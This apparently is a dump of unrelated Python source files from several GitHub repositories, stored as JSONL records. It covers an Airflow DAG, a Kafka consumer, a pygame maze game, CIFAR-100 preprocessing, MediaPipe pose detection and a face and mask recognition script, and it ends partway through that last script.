str(e)})\r\n","repo_name":"MarleneJiang/issue-ops","sub_path":".github/actions_scripts/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"26104859489","text":"# Food Truck Profit Prediction Tool\n\nimport pandas as pd \n#import numpy as np\nfrom sklearn.linear_model import LinearRegression\n#from sklearn.model_selection import train_test_split \n\ndataset = pd.read_csv('Foodtruck.csv')\n\nfeatures = dataset.iloc[:, :-1].values \nlabels = dataset.iloc[:, 1].values \n\n#features_train, features_test, labels_train, labels_test = train_test_split(features, labels, test_size=0.2, random_state=0)\n\nregressor = LinearRegression() \nregressor.fit(features, labels)\n\n\n#labels_pred = regressor.predict(features_test) \n\n#df = pd.DataFrame({'Actual': labels_test, 'Predicted': labels_pred})\n\nprofit = regressor.predict(3.5)\nprint(profit[0])","repo_name":"pulkitmathur10/FSBC2019","sub_path":"Day 16/Foodtruck.py","file_name":"Foodtruck.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29477094673","text":"\"\"\"\n5 УРОК\nРАЗРАБОТКА СВОИХ ПЛАГИНОВ\n\"\"\"\n\nfrom airflow import DAG\nfrom airflow.utils.dates import days_ago\nfrom airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.operators.python_operator import PythonOperator\nfrom y_niyazbayev_plugins.y_niyazbyaev_ram_operators import YerzhanRamTop3LocationOperator\n\nimport logging\n\n\nurl = \"https://rickandmortyapi.com/api/location\"\n\nDEFAULT_ARGS = {\n 'owner': 'y_niyazbayev',\n 'depends_on_past': False,\n 'start_date': days_ago(1),\n 'poke_interval': 600\n}\n\ndef load_to_db(**kwargs):\n ti = kwargs['ti']\n locations_list = ti.xcom_pull(task_ids='get_top3_locations')\n logging.info(f'locations_list: {locations_list}')\n\n pg_hook = PostgresHook(postgres_conn_id='conn_greenplum_write')\n conn = pg_hook.get_conn()\n cursor = conn.cursor()\n logging.info('Creating table')\n cursor.execute(\"CREATE TABLE IF NOT EXISTS {}\"\n \"(id integer, \"\n \"name character varying(50), \"\n \"type character varying(50), \"\n \"dimension character varying(50), \"\n \"resident_cnt integer);\"\n .format('y_niyazbayev_ram_location'))\n logging.info('Truncating table')\n cursor.execute(f'TRUNCATE TABLE y_niyazbayev_ram_location;')\n logging.info('Inserting rows')\n for location in locations_list:\n cursor.execute(\n \"INSERT INTO y_niyazbayev_ram_location VALUES(%s, %s, %s, %s, %s);\",\n (location[0], location[1], location[2], location[3], location[4])\n )\n conn.commit()\n logging.info('db updated')\n\n\nwith DAG(\"y_niyazbayev_homework_5\",\n schedule_interval='@daily',\n catchup=True,\n default_args=DEFAULT_ARGS,\n max_active_runs=1,\n tags=['y_niyazbayev']\n ) as dag:\n\n get_top3_locations = YerzhanRamTop3LocationOperator(\n task_id='get_top3_locations',\n url=url\n )\n\n load_locations_to_db = PythonOperator(\n task_id='load_locations_to_db',\n python_callable=load_to_db\n )\n\nget_top3_locations >> load_locations_to_db\n","repo_name":"skarfex/education.courses_data_engineer","sub_path":"karpov_airflow_fullrep/dags/y-niyazbayev/y-niyazbayev_homework_5.py","file_name":"y-niyazbayev_homework_5.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71448803769","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport kafka\nimport os\nfrom one_page_scraping import one_page_scraping\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\nKAFKA_HOST = os.getenv('KAFKA_HOST')\nKAFKA_PORT = os.getenv('KAFKA_PORT')\n\nwhich_partition = 0 #os.environ.get('PARTITION')\nwhich_topic = 'test' #os.environ.get('TOPIC')\n\nconsumer = kafka.KafkaConsumer(\n bootstrap_servers=[f'{KAFKA_HOST}:{KAFKA_PORT}'],\n auto_offset_reset='latest',\n enable_auto_commit=True,\n group_id='my-group',\n value_deserializer=lambda x: x.decode('utf-8'))\n\npartition = kafka.TopicPartition(topic=which_topic, partition=int(which_partition))\nconsumer.assign([partition])\n\nprint(f'topicname : {which_topic}, partitions : {consumer.partitions_for_topic(which_topic)}')\nprint(f'target : {consumer.assignment()}')\n\nprint(f'Start consuming ...\\n')\n\nfor record in consumer:\n message = record.value\n print(f'get message : ', message)\n try:\n url = message.split('|')[0]\n ts = message.split('|')[1]\n page = message.split('|')[2]\n one_page_scraping(url, ts, page)\n except IndexError:\n print('got wrong message . pass')\n\n \n","repo_name":"balao1312/project_104_multi","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19042280702","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0010_membership_payment'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='membership',\n name='approved_by',\n field=models.ForeignKey(related_name='memberships_approved', blank=True, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"bkawan/manutd.org.np","sub_path":"apps/users/migrations/0011_membership_approved_by.py","file_name":"0011_membership_approved_by.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10469855880","text":"import sys\nfrom PyQt4 import QtGui, QtCore\n\nclass Window(QtGui.QMainWindow):\n def __init__(self):\n super(Window, self).__init__()\n self.setGeometry(50, 50, 500, 300)\n self.setWindowTitle(\"System Monitoring\")\n self.setWindowIcon(QtGui.QIcon('favicon.png'))\n\n extractAction = QtGui.QAction('&Quit', self)\n extractAction.setShortcut(\"Ctrl+Q\")\n extractAction.setStatusTip('Leave the App')\n extractAction.triggered.connect(self.close_application)\n self.statusBar()\n mainMenu = self.menuBar()\n fileMenu = mainMenu.addMenu('&File')\n fileMenu.addAction(extractAction)\n \n self.home()\n #Tool bars are usually specific to the page that they are on\n #Therefore, we add them to the page itself instead of the core init\n def home(self):\n btn = QtGui.QPushButton('Quit', self)\n btn.clicked.connect(self.close_application)\n btn.resize(btn.minimumSizeHint())\n btn.move(35,35)\n #Setting up a button on the toolbar\n #You can replace the icon parameter with text if you don't want an image\n #First parameter is the icon, second is the hover message, third is self\n extractAction = QtGui.QAction(QtGui.QIcon('favicon.png'),'Quit', self)\n extractAction.triggered.connect(self.close_application)\n\n #This sets up the toolbar\n self.toolbar = self.addToolBar(\"Extraction\")\n #Adding our button to the toolbar\n self.toolbar.addAction(extractAction)\n \n self.show()\n\n def close_application(self):\n sys.exit()\n\n\ndef run(): \n app = QtGui.QApplication(sys.argv)\n GUI = Window()\n sys.exit(app.exec_())\n\nif __name__ == '__main__':\n run()\n","repo_name":"NathanJiangCS/Exploring-Python","sub_path":"PyQt/Tool Bar.py","file_name":"Tool Bar.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40253799615","text":"from nepali_datetime import date\nimport os\n\nfinancial_year_start = '04-01'\ndatabases = ['stock&vat.db','transactions.db']\n\ndef check_year():\n if 'old_databases' not in os.listdir():\n os.makedirs('old_databases')\n today_date = str(date.today())[5:]\n year = str(date.today())[:4]\n\n if (today_date==financial_year_start):\n new_dir = str(int(year)-1)+'-'+ year +'_databases'\n os.makedirs('old_databases/'+new_dir)\n\n \n for db in databases:\n os.rename(db,'old_databases/'+new_dir+'/'+db)","repo_name":"imbishal7/accounting-with-vat","sub_path":"financial_year.py","file_name":"financial_year.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"70909388408","text":"import pickle\n\nfrom flask import Flask, request, jsonify\nimport joblib\n\napp = Flask(__name__)\n\nwith open(\"dv.bin\", \"rb\") as infile:\n dv = pickle.load(infile)\n\nwith open(\"model1.bin\", \"rb\") as infile:\n model = pickle.load(infile)\n\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n data = request.get_json()\n X = dv.transform([data])\n prediction = model.predict_proba(X)[0]\n\n result = {\n 'prediction': prediction\n }\n\n return jsonify(result)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"ayehninnkhine/MLZoompcamp-Week5","sub_path":"Flask-predict.py","file_name":"Flask-predict.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40853605008","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n#import cvlib as CV\n#from cvlib.object_detection import draw_bbox\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom numpy import size\nfrom cls_File import *\nfrom cls_GlobalVarialble import *\n\nimport cv2\nimport mainwindow as main\n\n\n\nclass Cam:\n \n def __init__(self):\n \n self.camNum = int(GlobalVariable.CameraNum);\n #self.cap = self.cam_cap()\n self.videoStart = False\n #self.width = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n #self.height = int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n #self.fps = int(self.cap.get(cv2.CAP_PROP_FPS))\n self.fcc = cv2.VideoWriter_fourcc('M', 'J', 'P', 'G')\n \n self.detectMode = False\n self.frame = None\n self.detectObject = []\n\n \n def cam_cap(self):\n \n tmpcap = cv2.VideoCapture(self.camNum)\n return tmpcap\n \n \n def cam_isOpen(self):\n \n if self.cap.isOpened():\n print(\"Cam Connect\")\n return True\n else:\n print(\"Cam Connect Fail\")\n return True\n \n def cam_capture(self):\n \n if self.cam_isOpen:\n ret, frame = self.cap.read()\n frame = cv2.flip(frame,1) # 좌우 대칭\n tmpframe = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = None\n \n if ret:\n \n if self.detectMode:\n \n #bbox, self.detectObject, conf = CV.detect_common_objects(tmpframe)\n #print(bbox, label, conf)\n #drawframe = draw_bbox(tmpframe,bbox,self.detectObject,conf,write_conf=True)\n pass\n \n \n else:\n \n \n return tmpframe\n\n \n \n def cam_video_Save(self):\n \n i = 1\n date = File.get_Today()\n dir1 = GlobalVariable.videoPath\n File.make_foloder(dir1)\n dir2 = GlobalVariable.videoPath + \"/\" + date\n File.make_foloder(dir2)\n \n while True:\n \n Videopath = dir2 + \"/\" + str(i)+ \".avi\"\n \n if not os.path.exists(Videopath):\n out = cv2.VideoWriter(Videopath, self.fcc, self.fps, (self.width, self.height),isColor=True) # 3 width, 4 height\n break\n else:\n i += 1\n \n while self.videoStart:\n \n if self.cam_isOpen:\n \n ret, frame = self.cap.read()\n frame = cv2.flip(frame,1) # 좌우 대칭\n \n if ret:\n out.write(frame)\n\n \n else:\n print(\"Cam is Not Open\")\n \n def cam_video_Save(self,imageArr):\n \n \n i = 1\n date = File.get_Today()\n dir1 = GlobalVariable.videoPath\n File.make_foloder(dir1)\n dir2 = GlobalVariable.videoPath + \"/\" + date\n File.make_foloder(dir2)\n \n #size = (imageArr[0].width,imageArr[0].height)\n \n \n while True:\n \n Videopath = dir2 + \"/\" + str(i)+ \".avi\"\n \n if not os.path.exists(Videopath):\n # img_arry = []\n # for i in range(len(imageArr)):\n # #image = cv2.cvtColor(imageArr[i],cv2.COLOR_BGR2RGB)\n # #img = cv2.imread(image)\n # height, width, layers = imageArr[0].shape\n # size = (width,height)\n # img_arry.append(imageArr)\n \n # #out = cv2.VideoWriter(Videopath, self.fcc, 30, (1280, 720),isColor=True)\n # out = cv2.VideoWriter(Videopath, cv2.VideoWriter_fourcc(*'DIVX'),15,size)\n # for i in range(len(img_arry)):\n # out.write(img_arry[i])\n # #out.release() \n fps = 30\n frame_array = []\n \n out = cv2.VideoWriter(Videopath,cv2.VideoWriter_fourcc(*'DIVX'), fps, (640,480))\n for i in range(len(imageArr)):\n # writing to a image array\n out.write(imageArr[i])\n out.release()\n break\n else:\n i += 1\n \n \n \n \n \n def cam_Image_Save(self,image):\n \n i = 1\n \n date = File.get_Today()\n dir1 = GlobalVariable.imagePath\n File.make_foloder(dir1)\n dir2 = GlobalVariable.imagePath + \"/\" + date\n File.make_foloder(dir2)\n \n image = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\n \n while True:\n \n imgpath = dir2 + \"/\" + str(i)+ \".jpg\"\n \n if not os.path.exists(imgpath):\n cv2.imwrite(imgpath,image)\n break\n \n else:\n \n i += 1\n \n def cam_Video_Image_Save(self,image):\n \n i = 1\n j = 1\n \n date = File.get_Today()\n dir1 = GlobalVariable.videoPath\n File.make_foloder(dir1)\n dir2 = GlobalVariable.videoPath + \"/\" + date\n File.make_foloder(dir2)\n dir3 = GlobalVariable.videoPath + \"/\" + date + \"/\" + str(j)\n \n while True:\n if not os.path.isdir(dir3):\n os.mkdir(dir3)\n break\n else:\n j +=1\n \n image = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\n \n while True:\n \n imgpath = dir3 + \"/\" + str(i)+ \".jpg\"\n \n if not os.path.exists(imgpath):\n cv2.imwrite(imgpath,image)\n break\n \n else:\n \n i += 1\n\n def cam_Image_Load(self,Path):\n \n try:\n \n img = cv2.imread(Path, cv2.IMREAD_COLOR)\n frame = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n #resizeframe = cv2.resize(frame, dsize=(int(GlobalVariable.cameraX),int(GlobalVariable.cameraY)),interpolation=cv2.INTER_AREA)\n return frame\n \n except:\n pass\n\n def cam_Video_Load(self,path,GrabVideo):\n \n cap = cv2.VideoCapture(path)\n\n # 프레임 너비/높이, 초당 프레임 수 확인\n width = cap.get(cv2.CAP_PROP_FRAME_WIDTH) # 또는 cap.get(3)\n height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT) # 또는 cap.get(4)\n fps = cap.get(cv2.CAP_PROP_FPS) # 또는 cap.get(5)\n print('프레임 너비: %d, 프레임 높이: %d, 초당 프레임 수: %d' %(width, height, fps))\n \n while cap.isOpened(): \n ret, frame = cap.read()\n \n if not ret:\n \n break\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n \n tmpImage = QImage(frame.data, frame.shape[1], frame.shape[0], QImage.Format_RGB888)\n scene = QGraphicsScene()\n pixmap = QPixmap(tmpImage)\n item = QGraphicsPixmapItem(pixmap)\n scene.addItem(item)\n GrabVideo.setScene(scene)\n \n #return frame\n\n \n \n\n \n def SLAM_Image_Save(self,image):\n \n i = 1\n \n date = File.get_Today()\n dir1 = GlobalVariable.slamimagepath\n File.make_foloder(dir1)\n dir2 = GlobalVariable.slamimagepath + \"/\" + date\n File.make_foloder(dir2)\n \n #image = cv2.cvtColor(image)\n \n while True:\n \n imgpath = dir2 + \"/\" + str(i)+ \".png\"\n \n if not os.path.exists(imgpath):\n cv2.imwrite(imgpath,image)\n break\n \n else:\n \n i += 1\n \n ","repo_name":"PARKKYEONGCHOON/GuideRobot","sub_path":"robotsystem-COPY/scripts/cls_Cam.py","file_name":"cls_Cam.py","file_ext":"py","file_size_in_byte":8216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21919216865","text":"#!/usr/bin/python3\n# -*- coding: Utf-8 -*\n\n\"\"\"\n!!!! MacGyver Escape Game !!!!\nAuthor: Jimi Bourgeois\nVersion: 20190225\nProject: Project 3 OpenClassrooms\nCode language: Python3\nCoding: Utf-8\n\"\"\"\n#import the game interface module\nimport pygame\n#import modules for game operation\nfrom pygame.locals import *\nfrom structure_lab import *\nfrom constants import *\nfrom macgyver import *\n\ndef main():\n \"\"\"\n\tInitializes the game's interface, window size, name the window and game menu\n\n\tMain loop of the game:\n\tDisplays the maze in its various states after the player moves\n\tThe player recovers the objects simply by moving on them\n\tThe objects are placed randomly each time the game is loaded\n\tA counter indicates the progress of recovery of objects\n\tThe player wins under the condition to retrieve all the objects and find the\n\tgoalkeeper to go out otherwise the player loses\n\t\"\"\"\n\n pygame.init()\n\t#initialize the size of the window\n screen = pygame.display.set_mode((SIZE_SCREEN_WIDTH, SIZE_SCREEN_HEIGTH))\n\t#window name\n pygame.display.set_caption('MacGyver Escape Game')\n\n #main loop\n main_loop = 1\n while main_loop:\n #Formatting the game menu\n background = pygame.image.load(IMG_BACK).convert()\n bfont = pygame.image.load(IMG_BFONT).convert()\n screen.blit(bfont, (0, 600))\n screen.blit(background, (0, 0))\n pygame.display.update()\n\n #Loop of game menu and choice of level\n #Preventive loop in case of setting up several levels\n game_loop = 1\n home_loop = 1\n while home_loop:\n #limit of frame\n pygame.time.Clock().tick(30)\n for event in pygame.event.get():\n if event.type == QUIT or event.type == KEYDOWN and event.key == K_ESCAPE:\n home_loop = 0\n game_loop = 0\n main_loop = 0\n choice = 0\n elif event.type == KEYDOWN:\n if event.key == K_RETURN:\n home_loop = 0\n choice = 'map.txt'\n\n #Loading the chosen level\n if choice != 0:\n level = Load_structure_map(choice)\n level.load_map()\n level.load_structure(screen)\n\n mg = Character(IMG_MAC, level)\n\n #Loop of the game, update of the screen of the movement of the player\n #according to the direction taken, according to the collection of\n #objects and conditions of exit\n while game_loop:\n #limit of frame\n pygame.time.Clock().tick(30)\n for event in pygame.event.get():\n if event.type == QUIT:\n game_loop = 0\n home_loop = 0\n\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n game_loop = 0\n elif event.key == K_RIGHT:\n mg.move('right')\n elif event.key == K_LEFT:\n mg.move('left')\n elif event.key == K_UP:\n mg.move('up')\n elif event.key == K_DOWN:\n mg.move('down')\n\n level.load_structure(screen)\n screen.blit(mg.direction, (mg.mg_pos_x, mg.mg_pos_y))\n pygame.display.flip()\n\n #Display of objects recovery\n no_items = pygame.image.load(IMG_NO_ITEMS).convert()\n screen.blit(no_items, (180, 600))\n pygame.display.flip()\n\n if len(mg.item_loot) == 1:\n items_1_3 = pygame.image.load(IMG_ITEMS_1_3).convert()\n screen.blit(items_1_3, (180, 600))\n pygame.display.flip()\n\n if len(mg.item_loot) == 2:\n items_2_3 = pygame.image.load(IMG_ITEMS_2_3).convert()\n screen.blit(items_2_3, (180, 600))\n pygame.display.flip()\n\n if len(mg.item_loot) == 3:\n items_3_3 = pygame.image.load(IMG_ITEMS_3_3).convert()\n screen.blit(items_3_3, (180, 600))\n pygame.display.flip()\n\n #Exit conditions\n if level.structure[mg.mg_y][mg.mg_x] == 'G':\n if len(mg.item_loot) == 3:\n #Victory screen display\n win = pygame.image.load(IMG_MACWIN).convert()\n bfont = pygame.image.load(IMG_BFONT).convert()\n screen.blit(bfont, (0, 600))\n screen.blit(win, (0, 0))\n pygame.display.update()\n home_loop = 0\n\n else:\n #Defeat screen display\n loose = pygame.image.load(IMG_MACLOOSE).convert()\n bfont = pygame.image.load(IMG_BFONT).convert()\n screen.blit(bfont, (0, 600))\n screen.blit(loose, (0, 0))\n pygame.display.update()\n home_loop = 0\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Bibjim/P3_MG_Pygame","sub_path":"game_app.py","file_name":"game_app.py","file_ext":"py","file_size_in_byte":5209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73049083770","text":"import sys\nsys.path.append('../utils')\nsys.path.append('../configs')\n\nfrom sklearn.model_selection import train_test_split\n# ../utils\nfrom reader import read_pkl\nfrom writer import write_npy, create_muldir\nfrom dataset_op import label_count\n\n# ../configs\nfrom path import CIFAR100PATH, CIFARPROCESSED\nfrom info import CIFARNCLASS\n\nimport numpy as np\nimport pickle\n\n\ntrain = read_pkl(CIFAR100PATH+'train', encoding='bytes')\ntest = read_pkl(CIFAR100PATH+'test', encoding='bytes')\n\ntrain_image = train[b'data'].astype(np.float32)/255\ntest_image = test[b'data'].astype(np.float32)/255\n\npixel_mean = np.mean(train_image, axis=0) # use global pixel mean only for train data\n\ntrain_image -= pixel_mean\ntest_image -= pixel_mean\n\ntrain_image = np.transpose(np.reshape(train_image, [-1,3,32,32]), [0,2,3,1])\ntrain_label = np.array(train[b'fine_labels'])\n\ntest_image = np.transpose(np.reshape(test_image, [-1,3,32,32]), [0,2,3,1])\ntest_label = np.array(test[b'fine_labels'])\n\ntrain_image, val_image, train_label, val_label = train_test_split(train_image, train_label, test_size=0.1, random_state=40, stratify=train_label) # Train Val split\n\nprint(\"Total of classes : %d\"%CIFARNCLASS)\nprint(\"Train info\")\nprint(\"Image : {}({}), Label : {}\".format(train_image.shape, train_image.dtype, train_label.shape))\nprint(\"Val info\")\nprint(\"Image : {}({}), Label : {}\".format(val_image.shape, val_image.dtype, val_label.shape))\nprint(\"Test info\")\nprint(\"Image : {}({}), Label : {}\".format(test_image.shape, test_image.dtype, test_label.shape))\n\ntrain_class_count = label_count(train_label, CIFARNCLASS)\nval_class_count = label_count(val_label, CIFARNCLASS)\ntest_class_count = label_count(test_label, CIFARNCLASS)\n\nprint(\"Train class mean : {}, std : {}\".format(np.mean(train_class_count), np.std(train_class_count)))\nprint(\"Val class mean : {}, std : {}\".format(np.mean(val_class_count), np.std(val_class_count)))\nprint(\"Test class mean : {}, std : {}\".format(np.mean(test_class_count), np.std(test_class_count)))\n\ncreate_muldir(CIFARPROCESSED)\nwrite_npy(train_image, CIFARPROCESSED+'train_image.npy') \nwrite_npy(train_label, CIFARPROCESSED+'train_label.npy') \nwrite_npy(val_image, CIFARPROCESSED+'val_image.npy') \nwrite_npy(val_label, CIFARPROCESSED+'val_label.npy') \nwrite_npy(test_image, CIFARPROCESSED+'test_image.npy') \nwrite_npy(test_label, CIFARPROCESSED+'test_label.npy') \n","repo_name":"maestrojeong/Deep-Hash-Table-ICML18","sub_path":"process/cifar_process.py","file_name":"cifar_process.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"77"} +{"seq_id":"27348543333","text":"# as module\n\nimport cv2\nimport mediapipe as mp \nimport time\nimport math\n\n# we are creating class so that we can create object and able to have/use methods\nclass poseDetector():\n\n def __init__(self):\n\n self.mp_drawing_styles = mp.solutions.drawing_styles \n self.mpDraw = mp.solutions.drawing_utils\n self.mpPose = mp.solutions.pose\n self.pose = self.mpPose.Pose() #creating pose\n \n def findPerson(self, img, draw=False):\n\n # this img is in BGR therefore...we convert it into RGB\n # imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n # self.results = self.pose.process(imgRGB)\n self.results = self.pose.process(img)\n # print(self.results.pose_landmarks)\n\n if self.results.pose_landmarks: # landmarks are there AND\n if draw: \n # Draw pose landmarks on the image. (0 to 32 points are there)\n self.mpDraw.draw_landmarks(img, self.results.pose_landmarks,self.mpPose.POSE_CONNECTIONS, landmark_drawing_spec= self.mp_drawing_styles.get_default_pose_landmarks_style()) # (img, make all the points, connect all the points, make all the points color different) \n # else:\n # print('no body is shown...')\n\n return img\n\n def findPosition(self, img, draw=False):\n self.lmList = [] #landmark list\n if self.results.pose_landmarks: #not none\n for id, lm in enumerate(self.results.pose_landmarks.landmark):\n h, w, c = img.shape #height, width, no. of channels(here is 3(which are Red, Blue, Green))\n # print(\"img.shape\",img.shape)\n # print(id, lm) #lm-> landmark values are the ratio of images\n\n # to get actual pixel values of lm\n cx, cy = int(lm.x*w) , int(lm.y*h)\n self.lmList.append([id,cx,cy]) \n\n if draw:\n #drawing circle at landmark points( just for checking)\n cv2.circle(img, (cx, cy), 3, (255,0,0), cv2.FILLED)\n # cv2.putText(img, str(id), (cx,cy), cv2.FONT_ITALIC, 1, (255,0,255), 2) # printing landmark count on body \n\n return self.lmList\n\n def findAngle(self, img, p1, p2, p3, draw= True, showAngle= False):\n\n # getting targeted landmarks x,y coordinates values\n p1_x, p1_y = self.lmList[p1][1:] # OR lmList[p1][1], lmList[p1][2])\n p2_x, p2_y = self.lmList[p2][1:]\n p3_x, p3_y = self.lmList[p3][1:]\n \n #finding angle\n angle = math.degrees(math.atan2(p3_y - p2_y, p3_x - p2_x) - math.atan2(p1_y - p2_y, p1_x - p2_x)) # math.degrees() will convert radian value to degree\n \n angle = (angle + 180) % 360 - 180\n angle = abs(angle)\n \n # drawing and joining targeted points\n if draw:\n # drawing joining line btw 3 points\n cv2.line(img, (p1_x, p1_y), (p2_x, p2_y), (255,255,255), 3)\n cv2.line(img, (p2_x, p2_y), (p3_x, p3_y), (255,255,255), 3)\n #highlighting 3 points\n cv2.circle(img, (p1_x,p1_y), 8, (0,0,255), cv2.FILLED)\n cv2.circle(img, (p1_x,p1_y), 12, (0,0,255), 2)\n cv2.circle(img, (p2_x,p2_y), 8, (0,0,255), cv2.FILLED)\n cv2.circle(img, (p2_x,p2_y), 12, (255,0,0), 2)\n cv2.circle(img, (p3_x,p3_y), 8, (0,0,255), cv2.FILLED)\n cv2.circle(img, (p3_x,p3_y), 12, (0,0,255), 2)\n\n if showAngle:\n cv2.putText(img, str(int(angle)), (p2_x+5, p2_y+5), cv2.FONT_HERSHEY_PLAIN, 2, (255,0,0), 2) \n\n return angle\n ","repo_name":"MadhavAgarwal1/Personal_Fitness_Gym","sub_path":"pose_Detector.py","file_name":"pose_Detector.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5525409923","text":"import cv2\nimport os\nimport numpy\nimport pandas\nfrom sklearn.decomposition import PCA\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.neighbors import KNeighborsClassifier\nimport warnings\n\n# Carrega um dataframe da biblioteca Pandas com as imagens para treinamento\ndef load_data_frame():\n # Cria um dict para organizar os dados\n data = {\n \"FILE\": [],\n \"LABEL\": [],\n \"TARGET\": [],\n \"IMAGE\": []\n }\n\n # Carrega as imagens com mascara e sem mascara\n mask = os.listdir(f\"images{os.sep}maskon\")\n no_mask = os.listdir(f\"images{os.sep}maskoff\")\n\n # Percorre o diretorio de imagens com mascara e preenche o dict data com as informações de cada imagem\n for file in mask:\n data[\"FILE\"].append(f\"images{os.sep}maskon{os.sep}{file}\")\n data[\"LABEL\"].append(f\"Com mascara\")\n data[\"TARGET\"].append(1)\n image = cv2.cvtColor(cv2.imread(f\"images{os.sep}maskon{os.sep}{file}\"), cv2.COLOR_BGR2GRAY).flatten()\n data[\"IMAGE\"].append(image)\n\n # Percorre o diretorio de imagens sem mascara e preenche o dict data com as informações de cada imagem\n for file in no_mask:\n data[\"FILE\"].append(f\"train{os.sep}maskoff{os.sep}{file}\")\n data[\"LABEL\"].append(f\"Sem mascara\")\n data[\"TARGET\"].append(0)\n image = cv2.cvtColor(cv2.imread(f\"images{os.sep}maskoff{os.sep}{file}\"), cv2.COLOR_BGR2GRAY).flatten()\n data[\"IMAGE\"].append(image)\n\n return pandas.DataFrame(data)\n\n# Divide o dataframe para treino e teste\ndef train_test(data_frame):\n X = list(data_frame[\"IMAGE\"])\n Y = list(data_frame[\"TARGET\"])\n\n return X, Y\n\n# Calcula a projeção dos dados em um vetor que maximize a variança dos dados e perca a menor quantidade de informação possível e realiza a extração de features das imagens\ndef pca_model(X_train):\n pca = PCA(n_components=30)\n pca.fit(X_train)\n\n return pca\n\n# Prever valores de quaisquer novos pontos de dados. O novo ponto recebe um valor baseado em quão próximo ele se parece dos pontos no conjunto de treinamento\ndef knn(X_train, Y_train):\n warnings.filterwarnings(\"ignore\")\n\n grid_params = {\n \"n_neighbors\": [2, 3, 5, 11, 19, 23, 29],\n \"weights\": [\"uniform\", \"distance\"],\n \"metric\": [\"euclidean\", \"manhattam\", \"cosine\", \"l1\", \"l2\"]\n }\n\n knn_model = GridSearchCV(KNeighborsClassifier(), grid_params, refit=True)\n knn_model.fit(X_train, Y_train)\n\n return knn_model\n\n# Define o path xml para pré-treino com o Cascade Classifier, reconhecendo rostos de forma genérica\nhaar_file = 'haarcascade_frontalface_alt2.xml'\n# Define o path do dataset para treinos\ndataset = 'dataset'\n\n# Cria uma lista de imagens e um lista com os nomes correspondentes\nimages = []\nlabels = []\nnames = {}\nid = 0\n\n# Percorre o diretório de datasets e preenche o array de imagens e nomes com os arquivos correspondentes\nfor (subdirs, dirs, files) in os.walk(dataset):\n for subdir in dirs:\n names[id] = subdir\n subdir_path = os.path.join(dataset, subdir)\n for file_name in os.listdir(subdir_path):\n path = subdir_path + \"/\" + file_name\n label = id\n images.append(cv2.imread(path, 0))\n labels.append(int(label))\n id += 1\n\n# Define o tamanho da área de reconhecimento\nwidth = 130\nheight = 100\n\n# Cria um array numpy para auxiliar nas comparações por conta de seus métodos\n(images, labels) = [numpy.array(lis) for lis in [images, labels]]\n\n# Treina o modelo com as imagens do dataset\nmodel = cv2.face.LBPHFaceRecognizer_create()\nmodel.train(images, labels)\n\n# Importa o XML para auxiliar no reconhecimento\nface_cascade = cv2.CascadeClassifier(haar_file)\n\n# Instancia a webcam\nwebcam = cv2.VideoCapture(0)\n\n# Carrega o dataframe com as imagens para treinamento\ndata_frame = load_data_frame()\n\n# Divide conjuntos de treino e teste\nX_train, y_train = train_test(data_frame)\n\n# Modelo PCA para extração de features da imagem\npca = pca_model(X_train)\n\n# Conjunto de treino com features extraídas\nX_train = pca.transform(X_train)\n\n# Treinando modelo classificatório KNN.\nknn = knn(X_train, y_train)\n\n# Rotulo para classificação\nlabel = {\n 0: \"Sem mascara\",\n 1: \"Com mascara\"\n}\n\nwhile True:\n # Inicia a camera\n (_, image) = webcam.read()\n\n # Converte a imagem capturada pela camera em cinza\n gray = cv2.cvtColor(image, 